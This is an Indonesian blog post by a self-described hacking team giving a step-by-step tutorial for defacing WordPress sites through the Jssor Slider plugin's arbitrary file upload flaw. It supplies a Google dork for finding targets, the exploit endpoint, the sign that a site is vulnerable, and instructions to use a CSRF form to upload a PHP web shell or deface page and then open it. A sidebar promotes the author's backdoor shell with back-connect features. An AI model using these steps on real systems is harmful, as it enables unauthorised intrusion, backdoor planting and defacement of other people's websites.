Langsung ke konten utama

Jssor Arbitary File Upload<WordPress>


Image result for exi2t cyber team

Hallo Semua sore sore gini enak nya bikin anak eh tutor ea.

1.Dork: Inurl:/wp-content/jssor-slider/ site:
2.Exploit:/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
Pertama kalian Dorking Dulu> Pilih salah satu website dan masuka exploit.





Jika vuln terdapat tulisan= {"jsonrpc" : "2.0", "result" : null, "id" : "id"} | Lihat gambar.

Okay masukan website nya kedalam CSRF Ganti Site.com menjadi website yang vuln, Jika sudah simpan sript dengan format .HTML

Jika sudah, buka CSRF tersebut.

Klik upload.







Upload Shell kalian ber extensi .php atau upload script deface kalian.

Jika Sudah Ter upload, buka SHELL atau SCRIPT deface.

Akses 

 /wp-content/jssor-slider/jssor-uploads/nama script.html

 /wp-content/jssor-slider/jssor-uploads/nama shell.php.



Sekian Tutorial Deface Jssor Arbitary Dari Saya jan9kr1k.

Support & Like Fp Kami 


Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

5 Cara untuk memulai bisnis Online/Internet

Nooooyoooo, Kali ini saya akan membagikan cara/tips memulai bisnis di internet, dengan simple saya menyajikan 5 tahap agar bisnis di internet bisa tercapai, jangan ragu untuk memulai , lihat,lakukan,kerjakan. okay SWIPE DOWN!!!  1. Membangun Blog/ Website Menurut saya, ini adalah langkah awal paling mudah yang bisa dilakukan oleh seorang pemula untuk membangun sebuah bisnis online. Belajar membangun sebuah blog/ website dengan topik tertentu dan memberikan manfaat bagi audiens adalah sesuatu yang tidak terlalu sulit. Kita bisa membuat blog yang berhubungan dengan minat/hobby dan keahlian, tentu ada banyak orang yang punya minat atau hobby yang sama dengan Anda. Mereka inilah yang nantinya menjadi audiens Anda. Setelah blog/ website Anda memliki banyak pengunjung, Anda bisa memonetize blog tersebut dengan banyak cara. Beberapa cara memonetize blog Anda adalah dengan memasang iklan, misalnya menjadi publisher dan memasang iklan PPC Google Adsense, iklan produk sendiri, iklan a...
Posting Komentar
Baca selengkapnya

Br3ak4r Mini Shell V.01

 Br3ak4r Mini Shell by JAN9KR1K Hallo semua balik lagi bersama gua, kali ini gua luncurin shell baru, yaitu Br3ak4r Mini Shell, shell backdoor mini, pas banget buat nge-upload di server rendah(low), shell ini di lengkapi dengan beberap fungsi. Uploader- PhpInfo- Code Injector- Domains list- Back Connecter- Kill Shell- Ya fitur lain masih dalam pengembangan, tunggu aja V.02, gw usahain shell masih size kecil, biar cepet pas nge-upload. Untuk lihat script klik link di bawah KLIK ME SENPAII :*  Selamat Tahun Baru 2019 cokk. Support Ter00s
Posting Komentar
Baca selengkapnya

Raup Untung dari Momen Natal dengan Bisnis Ini

Wah, sudah bulan Desember ya ternyata, kali ini TECTXPLOIT akan memberikan tips berbisnis. Pantas saja ya mal-mal dihiasi ornamen-ornamen yang biasa dipakai untuk menyambut hari Natal. Mulai dari pohon cemara yang berhiaskan lampu kelap-kelip, boneka salju dengan hidung wortelnya, pajangan berupa rangkaian daun, sampai kereta salju Sinterklas yang ditarik rusa. Semuanya terpajang di sisi-sisi yang mudah terlihat. Belum lagi ditambah dengan diskon-diskon yang terpampang di etalase toko yang membuat orang tertarik untuk berbelanja. Momen Natal ini benar-benar dimanfaatkan untuk meraup untung ya. Bicara soal untung, Anda pun juga bisa meraup untung dengan memanfaatkan momen Natal. Memang bulan Desember ini adalah waktunya menjelang tutup tahun. Namun, bukan berarti Anda menutup peluang untuk mendulang untung. Sudah umum kalau kebanyakan orang tak mau melewatkan momen berharga semisal hari raya tanpa belanja. Terlebih bagi yang menerima penghasilan tiap bulannya, ada THR yang ak...
Posting Komentar
Baca selengkapnya